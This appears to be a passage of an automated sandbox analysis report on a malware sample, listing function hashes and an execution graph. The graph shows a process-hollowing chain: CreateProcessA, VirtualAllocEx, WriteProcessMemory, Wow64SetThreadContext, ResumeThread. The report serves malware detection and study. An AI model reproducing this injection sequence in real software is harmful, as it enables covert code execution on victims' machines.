                                        • Opcode Fuzzy Hash: 6d86ec4bad0151a0a4077924d0f7d5c6c12493a218a9ab486df23a68eeced445
                                        • Instruction Fuzzy Hash: 6C1145B48043488FCB20DF9AD844BDEBBF8EB48310F248459E519A7210D378A980CFA4
                                        Function 00E4D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b6f0aab4f843787040bd9d1b7b2d9542d23c3a59b4796ad2bea6887b1857fab
                                        • Instruction ID: fb89a2af4ba5707c1e2a3635899095795fd26cea369fc30642d12a9091d672f0
                                        • Opcode Fuzzy Hash: 1b6f0aab4f843787040bd9d1b7b2d9542d23c3a59b4796ad2bea6887b1857fab
                                        • Instruction Fuzzy Hash: 7221F271608204DFCB15DF24E984B26BF66FB88318F20C56DD90A5B396C33AD807CA61
                                        Function 00E4D104 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 021f1bc4eee7a2387d45de10861ba0cbfc8513c0fde6de12000250f8adb4f8bc
                                        • Instruction ID: 550900f86e291c0e119d600fc7b154e55d9c93c848cf74ba89c79925ba04894a
                                        • Opcode Fuzzy Hash: 021f1bc4eee7a2387d45de10861ba0cbfc8513c0fde6de12000250f8adb4f8bc
                                        • Instruction Fuzzy Hash: A821C271609244EFDB04DF24E9C4B26BF65FB98318F20C5ADED095B356C33AD846C661
                                        Function 00E4D005 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 67651fe8b71d5d4b11ed0016d453de5099bac086a85491d3873fde876265469c
                                        • Instruction ID: 4435314ffd77fc48382be9b6089a19eafba8eaff681590356658032cba4c7ead
                                        • Opcode Fuzzy Hash: 67651fe8b71d5d4b11ed0016d453de5099bac086a85491d3873fde876265469c
                                        • Instruction Fuzzy Hash: 0021807550D3808FCB02CF24D994715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                        Function 00E4D0FF Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4455534634.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_e4d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                        • Instruction ID: 01ecac0a27b6379f5b88b46431f41f8fc408592d8668860fceb37633ac873c17
                                        • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                        • Instruction Fuzzy Hash: DA11BB75508280CFDB06CF10D9C4B15BFA1FB94318F24C6A9DC494B756C33AD84ACB52

                                        Execution Graph

                                        Execution Coverage:10.9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:203
                                        Total number of Limit Nodes:11
                                        execution_graph 29723 2e0acb0 29724 2e0acbf 29723->29724 29727 2e0ad97 29723->29727 29735 2e0ada8 29723->29735 29728 2e0addc 29727->29728 29729 2e0adb9 29727->29729 29728->29724 29729->29728 29743 2e0b040 29729->29743 29747 2e0b031 29729->29747 29730 2e0afe0 GetModuleHandleW 29732 2e0b00d 29730->29732 29731 2e0add4 29731->29728 29731->29730 29732->29724 29736 2e0adb9 29735->29736 29738 2e0addc 29735->29738 29736->29738 29741 2e0b040 LoadLibraryExW 29736->29741 29742 2e0b031 LoadLibraryExW 29736->29742 29737 2e0add4 29737->29738 29739 2e0afe0 GetModuleHandleW 29737->29739 29738->29724 29740 2e0b00d 29739->29740 29740->29724 29741->29737 29742->29737 29744 2e0b054 29743->29744 29746 2e0b079 29744->29746 29751 2e0a168 29744->29751 29746->29731 29748 2e0b054 29747->29748 29749 2e0b079 29748->29749 29750 2e0a168 LoadLibraryExW 29748->29750 29749->29731 29750->29749 29752 2e0b220 LoadLibraryExW 29751->29752 29754 2e0b299 29752->29754 29754->29746 29778 2d44fe0 29779 2d4516b 29778->29779 29781 2d45006 29778->29781 29781->29779 29782 2d42e6c 29781->29782 29783 2d45260 PostMessageW 29782->29783 29784 2d452cc 29783->29784 29784->29781 29702 2e04668 29703 2e0467a 29702->29703 29704 2e04686 29703->29704 29706 2e04779 29703->29706 29707 2e0479d 29706->29707 29711 2e04888 29707->29711 29715 2e04878 29707->29715 29712 2e048af 29711->29712 29713 2e0498c 29712->29713 29719 2e044e0 29712->29719 29717 2e048af 29715->29717 29716 2e0498c 29717->29716 29718 2e044e0 CreateActCtxA 29717->29718 29718->29716 29720 2e05918 CreateActCtxA 29719->29720 29722 2e059db 29720->29722 29755 2e0d438 29756 2e0d47e 29755->29756 29760 2e0d608 29756->29760 29763 2e0d618 29756->29763 29757 2e0d56b 29766 2e0b790 29760->29766 29764 2e0d646 29763->29764 29765 2e0b790 DuplicateHandle 29763->29765 29764->29757 29765->29764 29767 2e0d680 DuplicateHandle 29766->29767 29768 2e0d646 29767->29768 29768->29757 29769 2d411c8 29770 2d411fb 29769->29770 29771 2d41269 29770->29771 29773 2d415b0 29770->29773 29774 2d415b7 ResumeThread 29773->29774 29775 2d4151a 29773->29775 29777 2d41629 29774->29777 29775->29771 29777->29771 29785 2d424aa 29786 2d42484 29785->29786 29787 2d42494 29785->29787 29791 2d43cb0 29786->29791 29796 2d43d0e 29786->29796 29802 2d43ca1 29786->29802 29792 2d43cca 29791->29792 29807 2d44010 29792->29807 29826 2d43fd1 29792->29826 29793 2d43cee 29793->29787 29797 2d43c9c 29796->29797 29799 2d43d11 29796->29799 29800 2d44010 12 API calls 29797->29800 29801 2d43fd1 12 API calls 29797->29801 29798 2d43cee 29798->29787 29799->29787 29800->29798 29801->29798 29803 2d43cca 29802->29803 29805 2d44010 12 API calls 29803->29805 29806 2d43fd1 12 API calls 29803->29806 29804 2d43cee 29804->29787 29805->29804 29806->29804 29808 2d44025 29807->29808 29809 2d44037 29808->29809 29846 2d44288 29808->29846 29851 2d4482e 29808->29851 29856 2d4422d 29808->29856 29860 2d447ac 29808->29860 29865 2d442e3 29808->29865 29869 2d44683 29808->29869 29874 2d44943 29808->29874 29879 2d44402 29808->29879 29885 2d445e1 29808->29885 29890 2d44426 29808->29890 29894 2d4415a 29808->29894 29898 2d445ff 29808->29898 29902 2d442d6 29808->29902 29907 2d44ad6 29808->29907 29912 2d443d6 29808->29912 29917 2d44488 29808->29917 29809->29793 29827 2d43f8b 29826->29827 29828 2d43fef 29826->29828 29827->29793 29829 2d44037 29828->29829 29830 2d443d6 2 API calls 29828->29830 29831 2d44ad6 2 API calls 29828->29831 29832 2d442d6 2 API calls 29828->29832 29833 2d445ff 2 API calls 29828->29833 29834 2d4415a 2 API calls 29828->29834 29835 2d44426 2 API calls 29828->29835 29836 2d445e1 2 API calls 29828->29836 29837 2d44402 2 API calls 29828->29837 29838 2d44943 2 API calls 29828->29838 29839 2d44683 2 API calls 29828->29839 29840 2d442e3 2 API calls 29828->29840 29841 2d447ac 2 API calls 29828->29841 29842 2d4422d 2 API calls 29828->29842 29843 2d4482e 2 API calls 29828->29843 29844 2d44288 2 API calls 29828->29844 29845 2d44488 2 API calls 29828->29845 29829->29793 29830->29829 29831->29829 29832->29829 29833->29829 29834->29829 29835->29829 29836->29829 29837->29829 29838->29829 29839->29829 29840->29829 29841->29829 29842->29829 29843->29829 29844->29829 29845->29829 29847 2d442a3 29846->29847 29849 2d415b0 ResumeThread 29847->29849 29922 2d415b8 29847->29922 29848 2d441b5 29848->29809 29849->29848 29852 2d447c6 29851->29852 29854 2d415b0 ResumeThread 29852->29854 29855 2d415b8 ResumeThread 29852->29855 29853 2d441b5 29853->29809 29854->29853 29855->29853 29926 2d41c30 29856->29926 29931 2d41c38 29856->29931 29857 2d4425e 29857->29809 29861 2d447b4 29860->29861 29863 2d415b0 ResumeThread 29861->29863 29864 2d415b8 ResumeThread 29861->29864 29862 2d441b5 29862->29809 29863->29862 29864->29862 29935 2d41660 29865->29935 29939 2d41668 29865->29939 29866 2d44302 29866->29809 29870 2d44689 29869->29870 29872 2d415b0 ResumeThread 29870->29872 29873 2d415b8 ResumeThread 29870->29873 29871 2d441b5 29871->29809 29872->29871 29873->29871 29875 2d4495e 29874->29875 29877 2d41c30 WriteProcessMemory 29875->29877 29878 2d41c38 WriteProcessMemory 29875->29878 29876 2d4497f 29877->29876 29878->29876 29881 2d44407 29879->29881 29880 2d445d2 29880->29809 29881->29880 29883 2d415b0 ResumeThread 29881->29883 29884 2d415b8 ResumeThread 29881->29884 29882 2d441b5 29882->29809 29883->29882 29884->29882 29886 2d445f8 29885->29886 29888 2d41c30 WriteProcessMemory 29886->29888 29889 2d41c38 WriteProcessMemory 29886->29889 29887 2d4497f 29888->29887 29889->29887 29943 2d41b70 29890->29943 29947 2d41b78 29890->29947 29891 2d44447 29891->29809 29951 2d41eb5 29894->29951 29955 2d41ec0 29894->29955 29900 2d41c30 WriteProcessMemory 29898->29900 29901 2d41c38 WriteProcessMemory 29898->29901 29899 2d4462d 29899->29809 29900->29899 29901->29899 29903 2d44711 29902->29903 29959 2d41d21 29903->29959 29964 2d41d28 29903->29964 29904 2d44733 29908 2d446d7 29907->29908 29909 2d441b5 29907->29909 29908->29909 29910 2d41660 Wow64SetThreadContext 29908->29910 29911 2d41668 Wow64SetThreadContext 29908->29911 29909->29809 29910->29908 29911->29908 29913 2d443dc 29912->29913 29914 2d441b5 29913->29914 29915 2d41660 Wow64SetThreadContext 29913->29915 29916 2d41668 Wow64SetThreadContext 29913->29916 29914->29809 29915->29913 29916->29913 29918 2d442a3 29917->29918 29920 2d415b0 ResumeThread 29918->29920 29921 2d415b8 ResumeThread 29918->29921 29919 2d441b5 29919->29809 29920->29919 29921->29919 29923 2d415f8 ResumeThread 29922->29923 29925 2d41629 29923->29925 29925->29848 29927 2d41c37 WriteProcessMemory 29926->29927 29928 2d41c08 29926->29928 29930 2d41cd7 29927->29930 29928->29857 29930->29857 29932 2d41c80 WriteProcessMemory 29931->29932 29934 2d41cd7 29932->29934 29934->29857 29936 2d416ad Wow64SetThreadContext 29935->29936 29938 2d416f5 29936->29938 29938->29866 29940 2d416ad Wow64SetThreadContext 29939->29940 29942 2d416f5 29940->29942 29942->29866 29944 2d41b78 VirtualAllocEx 29943->29944 29946 2d41bf5 29944->29946 29946->29891 29948 2d41bb8 VirtualAllocEx 29947->29948 29950 2d41bf5 29948->29950 29950->29891 29952 2d41ec0 CreateProcessA 29951->29952 29954 2d4210b 29952->29954 29956 2d41f49 CreateProcessA 29955->29956 29958 2d4210b 29956->29958 29960 2d41d27 ReadProcessMemory 29959->29960 29961 2d41cf8 29959->29961 29963 2d41db7 29960->29963 29961->29904 29963->29904 29965 2d41d73 ReadProcessMemory 29964->29965 29967 2d41db7 29965->29967 29967->29904

                                        Executed Functions

                                        Function 07483D50 Relevance: 9.0, Strings: 7, Instructions: 280COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 294 7483d50-7483d79 379 7483d79 call 7484190 294->379 380 7483d79 call 7484182 294->380 296 7483d7f-7483dda call 74839ec 305 7483ddd-7483df2 296->305 307 7483df4 305->307 308 7483df9-7483e0e 307->308 309 7483e59-7483ea5 308->309 310 7483e10 308->310 314 7483ee0 309->314 318 7483ea7 309->318 310->307 310->309 311 7483f28-7483f3c 310->311 312 7483eca-7483ede 310->312 313 7483f4c 310->313 310->314 315 7483e22-7483e3d 310->315 316 7484062-7484065 310->316 317 7483f05 310->317 310->318 319 748409b-7484111 310->319 320 7483f7c-7483fcd 310->320 321 7483f3e 310->321 322 7483e3f-7483e41 310->322 323 7484130-7484137 310->323 324 7483e17-7483e19 310->324 330 7483f0a-7483f1f 311->330 331 7483eac-7483ec1 312->331 328 7483f51-7483f66 313->328 314->317 315->308 377 7484068 call 7486448 316->377 378 7484068 call 7486445 316->378 317->330 318->331 374 7484113 call 7488c78 319->374 375 7484113 call 74884ef 319->375 376 7484113 call 7488c61 319->376 356 7483fcf-7483fd5 320->356 357 7483fe5-7484037 320->357 321->313 326 7483e4a 322->326 327 7483e43-7483e48 322->327 324->305 325 7483e1b-7483e20 324->325 325->308 333 7483e4f-7483e57 326->333 327->333 328->323 335 7483f6c 328->335 330->321 338 7483f21 330->338 331->314 339 7483ec3 331->339 333->308 334 748406e-7484075 381 748407a call 7487f18 334->381 382 748407a call 7487f28 334->382 383 748407a call 74880d8 334->383 384 748407a call 7488169 334->384 385 748407a call 748726c 334->385 386 748407a call 748728c 334->386 387 748407a call 74872ac 334->387 388 748407a call 7488120 334->388 335->313 335->316 335->319 335->320 335->323 338->311 338->313 338->316 338->317 338->319 338->320 338->321 338->323 339->311 339->312 339->313 339->314 339->316 339->317 339->318 339->319 339->320 339->321 339->323 343 7484080 389 7484082 call 7488788 343->389 390 7484082 call 748877b 343->390 347 7484088-7484096 347->328 359 7483fd9-7483fdb 356->359 360 7483fd7 356->360 370 7484039-748403f 357->370 371 748404f-748405d 357->371 359->357 360->357 366 7484119 368 7484120-748412b 366->368 368->328 372 7484041 370->372 373 7484043-7484045 370->373 371->328 372->371 373->371 374->366 375->366 376->366 377->334 378->334 379->296 380->296 381->343 382->343 383->343 384->343 385->343 386->343 387->343 388->343 389->347 390->347
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                        • API String ID: 0-1582036792
                                        • Opcode ID: 38e6eaa02a584e972e4e0f68e7fcdf0d60a030f5b843b99950a868a5c7637366
                                        • Instruction ID: 3ed7dde48442a9dae2a05426294a35a16537c92e925c5009e82679acbac2a3fd
                                        • Opcode Fuzzy Hash: 38e6eaa02a584e972e4e0f68e7fcdf0d60a030f5b843b99950a868a5c7637366
                                        • Instruction Fuzzy Hash: 80A19574B502098FCB489F79D9957AE7AF7BF88B00F21842AE906DB394DE74DC058B41
                                        Function 07483CC8 Relevance: 5.3, Strings: 4, Instructions: 327COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 391 7483cc8-7483d79 479 7483d79 call 7484190 391->479 480 7483d79 call 7484182 391->480 399 7483d7f-7483dda call 74839ec 408 7483ddd-7483df2 399->408 410 7483df4 408->410 411 7483df9-7483e0e 410->411 412 7483e59-7483ea5 411->412 413 7483e10 411->413 417 7483ee0 412->417 421 7483ea7 412->421 413->410 413->412 414 7483f28-7483f3c 413->414 415 7483eca-7483ede 413->415 416 7483f4c 413->416 413->417 418 7483e22-7483e3d 413->418 419 7484062-7484065 413->419 420 7483f05 413->420 413->421 422 748409b-7484111 413->422 423 7483f7c-7483fcd 413->423 424 7483f3e 413->424 425 7483e3f-7483e41 413->425 426 7484130-7484137 413->426 427 7483e17-7483e19 413->427 433 7483f0a-7483f1f 414->433 434 7483eac-7483ec1 415->434 431 7483f51-7483f66 416->431 417->420 418->411 477 7484068 call 7486448 419->477 478 7484068 call 7486445 419->478 420->433 421->434 491 7484113 call 7488c78 422->491 492 7484113 call 74884ef 422->492 493 7484113 call 7488c61 422->493 459 7483fcf-7483fd5 423->459 460 7483fe5-7484037 423->460 424->416 429 7483e4a 425->429 430 7483e43-7483e48 425->430 427->408 428 7483e1b-7483e20 427->428 428->411 436 7483e4f-7483e57 429->436 430->436 431->426 438 7483f6c 431->438 433->424 441 7483f21 433->441 434->417 442 7483ec3 434->442 436->411 437 748406e-7484075 481 748407a call 7487f18 437->481 482 748407a call 7487f28 437->482 483 748407a call 74880d8 437->483 484 748407a call 7488169 437->484 485 748407a call 748726c 437->485 486 748407a call 748728c 437->486 487 748407a call 74872ac 437->487 488 748407a call 7488120 437->488 438->416 438->419 438->422 438->423 438->426 441->414 441->416 441->419 441->420 441->422 441->423 441->424 441->426 442->414 442->415 442->416 442->417 442->419 442->420 442->421 442->422 442->423 442->424 442->426 446 7484080 489 7484082 call 7488788 446->489 490 7484082 call 748877b 446->490 450 7484088-7484096 450->431 462 7483fd9-7483fdb 459->462 463 7483fd7 459->463 473 7484039-748403f 460->473 474 748404f-748405d 460->474 462->460 463->460 469 7484119 471 7484120-748412b 469->471 471->431 475 7484041 473->475 476 7484043-7484045 473->476 474->431 475->474 476->474 477->437 478->437 479->399 480->399 481->446 482->446 483->446 484->446 485->446 486->446 487->446 488->446 489->450 490->450 491->469 492->469 493->469
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$$]q$$]q
                                        • API String ID: 0-3083981010
                                        • Opcode ID: 44d038bbc2117fba516fa16427cc401e8d126304a8a3455c08f206d010836ff3
                                        • Instruction ID: 5586c643269f21535a24515aebce9a4d4cb6736e2e8d1b07a970af07c7fe68ce
                                        • Opcode Fuzzy Hash: 44d038bbc2117fba516fa16427cc401e8d126304a8a3455c08f206d010836ff3
                                        • Instruction Fuzzy Hash: 1FB1C174B442198FCB44DF78D9A57AE7BF2BF88B00F14446AE806DB3A1DA74CC058B81
                                        Function 07483EE3 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 547 7483ee3-7483f03 549 7483f3e 547->549 550 7483f05 547->550 551 7483f4c 549->551 552 7483f0a-7483f1f 550->552 553 7483f51-7483f66 551->553 552->549 554 7483f21 552->554 555 7483f6c 553->555 556 7484130-7484137 553->556 554->549 554->550 554->551 554->556 557 7483f28-7483f3c 554->557 558 748409b-7484111 554->558 559 7483f7c-7483fcd 554->559 560 7484062-7484065 554->560 555->551 555->556 555->558 555->559 555->560 557->552 605 7484113 call 7488c78 558->605 606 7484113 call 74884ef 558->606 607 7484113 call 7488c61 558->607 575 7483fcf-7483fd5 559->575 576 7483fe5-7484037 559->576 595 7484068 call 7486448 560->595 596 7484068 call 7486445 560->596 561 748406e-7484075 597 748407a call 7487f18 561->597 598 748407a call 7487f28 561->598 599 748407a call 74880d8 561->599 600 748407a call 7488169 561->600 601 748407a call 748726c 561->601 602 748407a call 748728c 561->602 603 748407a call 74872ac 561->603 604 748407a call 7488120 561->604 565 7484080 593 7484082 call 7488788 565->593 594 7484082 call 748877b 565->594 568 7484088-7484096 568->553 578 7483fd9-7483fdb 575->578 579 7483fd7 575->579 589 7484039-748403f 576->589 590 748404f-748405d 576->590 578->576 579->576 585 7484119 587 7484120-748412b 585->587 587->553 591 7484041 589->591 592 7484043-7484045 589->592 590->553 591->590 592->590 593->568 594->568 595->561 596->561 597->565 598->565 599->565 600->565 601->565 602->565 603->565 604->565 605->585 606->585 607->585
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 95a0644df21141276dac802f27dba2a7ea87a638c1f11da5ba7fcf94030cbfba
                                        • Instruction ID: 11075557ae1d53f0cdc1a1de82a88fe012ba854372a9df06539fa5cefefd3c20
                                        • Opcode Fuzzy Hash: 95a0644df21141276dac802f27dba2a7ea87a638c1f11da5ba7fcf94030cbfba
                                        • Instruction Fuzzy Hash: 56519274B002099FDB449F75D995BAE7AB3BF88B00F24846AE9069B395CE75DC05CB80
                                        Function 0748877B Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: bc8834a8e5de910d0008f75b189e771eac5b752a9f4b19a08f0acdf7f84b2288
                                        • Instruction ID: 3d8a723e0cdd4e705a7c8231de30f73566c0c2d8f4452aa6891436c1bccbd4a3
                                        • Opcode Fuzzy Hash: bc8834a8e5de910d0008f75b189e771eac5b752a9f4b19a08f0acdf7f84b2288
                                        • Instruction Fuzzy Hash: 69411C71F34209CBD7959EB589515EFB7BBABC9600F90882BD501BB294CA308D428752
                                        Function 07488788 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: 083a94b30d62b91919b5db916a10955c56874216388b44719be09309ccac01be
                                        • Instruction ID: fb0fb9063e0159136fd05a8cadee2cdcfa630e57fb3a5f1eb67283ca596e4399
                                        • Opcode Fuzzy Hash: 083a94b30d62b91919b5db916a10955c56874216388b44719be09309ccac01be
                                        • Instruction Fuzzy Hash: AF411D71F34109C7DB98AEB589516EFB6BBEBC9600F90882BD501BB244CA348D428751
                                        Function 07480F89 Relevance: .3, Instructions: 282COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 010aa3334679b4d914c277dcb196f3d62ee13ffdb138c33ce78e9a7995a138b8
                                        • Instruction ID: 37b84f5c9fb5465eae3529c447378f9cf3c360b7adbf9c6a9c179e67934b6b94
                                        • Opcode Fuzzy Hash: 010aa3334679b4d914c277dcb196f3d62ee13ffdb138c33ce78e9a7995a138b8
                                        • Instruction Fuzzy Hash: 2FA123B212819CCFD785DB64D9908ED7BA1EB42310B56889FC906EF662C730D947CB81
                                        Function 07481060 Relevance: .2, Instructions: 173COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ac50db842e306d22b317210fb3999835c66f3d87697ad2dd2a8ae35bfcd09dd
                                        • Instruction ID: cd4083dd8bf50ed65c3f1a75c89326bba23fe16b3917236aefecf9297e88c72d
                                        • Opcode Fuzzy Hash: 2ac50db842e306d22b317210fb3999835c66f3d87697ad2dd2a8ae35bfcd09dd
                                        • Instruction Fuzzy Hash: B961BEB122415DCFC785DF28C9804AD7BB6BB86300F52885BD916EB261D731ED47CB45
                                        Function 07487F18 Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7bc0f0c383dadd6a0575983a07ce1c350b43adb3605e19cfa9b9f5ab094cd856
                                        • Instruction ID: 3340714e7b5d1fbc2828d9f96ec522adf8e10f78514140cba4b9ff94a3e2fac1
                                        • Opcode Fuzzy Hash: 7bc0f0c383dadd6a0575983a07ce1c350b43adb3605e19cfa9b9f5ab094cd856
                                        • Instruction Fuzzy Hash: 5A41B571B1411DDFC786EFE9C9514EEFBB6EF89210F20446BE605EB260D63289428B85
                                        Function 07487F28 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c8112d40c62eeda04542126e9dee92d152a2529be108e6b758153888afa3483
                                        • Instruction ID: ec7909346c5d28c5a19aed2dd3368cf47d2e7904cbe637ef3da0a11c287f4f28
                                        • Opcode Fuzzy Hash: 0c8112d40c62eeda04542126e9dee92d152a2529be108e6b758153888afa3483
                                        • Instruction Fuzzy Hash: 3341A675A1411DDBC785AFE9C9518EEFBB6EF89210F70441BE609EB260C6318D428B85
                                        Function 0748C228 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b96afb15ec6d1418e283e73bf5d444bc5c5fac393c511e74c95553506c079a4b
                                        • Instruction ID: 07a3d1dab15f6b592b5b3620356cfb4723210122b9ed1fb06fb6b25ae0fd7058
                                        • Opcode Fuzzy Hash: b96afb15ec6d1418e283e73bf5d444bc5c5fac393c511e74c95553506c079a4b
                                        • Instruction Fuzzy Hash: F431B5B0D1861CCBDB58DFABD8853EEBAF7AF8A300F04D46AD409A6254DB3405468F60
                                        Function 07483F41 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 608 7483f41-7483f49 610 7483f4c 608->610 611 7483f51-7483f66 610->611 612 7483f6c 611->612 613 7484130-7484137 611->613 612->610 612->613 614 748409b-7484111 612->614 615 7483f7c-7483fcd 612->615 616 7484062-7484065 612->616 658 7484113 call 7488c78 614->658 659 7484113 call 74884ef 614->659 660 7484113 call 7488c61 614->660 630 7483fcf-7483fd5 615->630 631 7483fe5-7484037 615->631 648 7484068 call 7486448 616->648 649 7484068 call 7486445 616->649 617 748406e-7484075 650 748407a call 7487f18 617->650 651 748407a call 7487f28 617->651 652 748407a call 74880d8 617->652 653 748407a call 7488169 617->653 654 748407a call 748726c 617->654 655 748407a call 748728c 617->655 656 748407a call 74872ac 617->656 657 748407a call 7488120 617->657 620 7484080 661 7484082 call 7488788 620->661 662 7484082 call 748877b 620->662 623 7484088-7484096 623->611 633 7483fd9-7483fdb 630->633 634 7483fd7 630->634 644 7484039-748403f 631->644 645 748404f-748405d 631->645 633->631 634->631 640 7484119 642 7484120-748412b 640->642 642->611 646 7484041 644->646 647 7484043-7484045 644->647 645->611 646->645 647->645 648->617 649->617 650->620 651->620 652->620 653->620 654->620 655->620 656->620 657->620 658->640 659->640 660->640 661->623 662->623
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 32cfbecbdfd74e273039be7ab650ae6805e7781e87728c0544ae10d819fb9753
                                        • Instruction ID: 272074957d9e92ab3917daca0f4c3eabc8b96a9036f8c21b7fddbfc635981ee7
                                        • Opcode Fuzzy Hash: 32cfbecbdfd74e273039be7ab650ae6805e7781e87728c0544ae10d819fb9753
                                        • Instruction Fuzzy Hash: 6B519234B002099FDB449F75D995BAE7AF3BF88B00F208429E9069B395DE75DC01CB40
                                        Function 07483F7B Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                        Download Yara Rule
